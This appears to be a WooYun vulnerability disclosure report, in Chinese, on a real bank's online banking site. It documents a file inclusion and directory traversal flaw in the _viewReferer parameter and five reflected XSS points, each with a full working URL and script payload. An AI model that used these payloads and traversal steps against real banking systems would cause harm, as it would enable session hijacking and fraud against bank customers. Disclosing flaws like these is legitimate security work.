WooYun.org

1、文件包含
说明：这个洞应该就是之前科蓝发生的文件包含通杀洞涉及N家银行，任意文件包含，不知道柯蓝确认修了没，一看参数CSIISignature就知道是科蓝公司的，讲下我发现的过程。
链接：https://ibs.bjrcb.com/per/login.do
参数：_viewReferer
默认是这个样子滴，如图：
_viewReferer=login&PasswordEncode=&_locale=zh_CN&CSIISignature=bjrcb&UserCert=&T=1&CertEnableFlag=NO&randKey=736383&UserId=1111111111&_tokenName=7bqq

观察参数viewReferer，它的值是login，猜想它是个文件，只是后缀被省去了后缀，试下%00

发现提示个这个，然后我试了多个截断字符，发现“%3f”，可以截断，并且确实是我猜测的在代码层加入后缀的，如图：

你会发现它去找文件了“找不到文件：/WEB-INF/zh_CN/login”，那么试试../是否能跨到上层目录呢，如图：

发现确实跨到上层目录去找文件了，那么是否能包含文件并解析呢，我试图去查找并包含web.xml文件，但是并没有找到，如图：

但是经过我测试这个包含确实存在，比如我找张图片，它可以很完美的包含并解析出来，如图：

2、XSS跨站脚本攻击
功能点：大额取现预约
连接：CashUseage赋值11 "/><script>alert(1)</script>
https://ibs.bjrcb.com/per/DrawAppointmentQueryDetail.do?AppJnlNo=55699785&AcNo=1111111&Amount=50000&RecordDate=2015-06-14&DrawDate=2015-06-20&Branch=Ììͨԕ֧ÐÐÁúÐË•ÖÀí´¦&AppStatus=1&UserName=xss&UserPhone=15910773439&UserMobilePhone=15910773439&AppSMSInform=0&CashUseage=1"/><script>alert(1)</script>

3、XSS跨站脚本攻击
功能点：活期转定期
连接：https://ibs.bjrcb.com/per/Current2Fixed02.do
参数：Remark赋值11 "/><script>alert(1)</script>
此处POST可以改为GET，把参数提上来就成：

4、XSS跨站脚本攻击
功能点：活期转定期
连接：https://ibs.bjrcb.com/per/CurrentSvFuDrawOpen02.do
参数：Remark 赋值11 "/><script>alert(1)</script>

POST改为GET，XXXX填入你登陆的账户：
https://ibs.bjrcb.com/per/CurrentSvFuDrawOpen02.do?_viewReferer=financing%2FCurrentSvFuDrawOpen01&RateSpan=2.22%25&AcNo=xxxxxxxx&Currency=01&Amount=50&SaveTime=Y01&AutoDeductFlag=1&Remark=1111%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

5、XSS跨站脚本攻击
功能点：活期转定期
连接：https://ibs.bjrcb.com/per/Current2Notice02.do
参数：Currency赋值01 "/><script>alert(1)</script>
POST改为GET，XXXXXXXXXX为对应账户号码：
https://ibs.bjrcb.com/per/Current2Notice02.do?_viewReferer=financing%2FCurrent2Notice01&AcNo=XXXXXXXXXX&Currency=01"/><script>alert(1)</script>&InformType=0330&Rate=0.96%25"&Amount=50000

6、XSS跨站脚本攻击
说明：这个XSS不同于上面，它直接把参数值带入到js代码中当参数运用，并且对传入的值进行了过滤，如图：

但是可以用”；“对js进行截断，使它执行js代码，并且它是在函数内，必须此函数调运才能执行，此处需点击确定后出发相应恶意js代码，如图：
https://ibs.bjrcb.com/per/OftenAcList.do?AcTransferType=111111;alert(1);

功能点：行内转账-常用收款人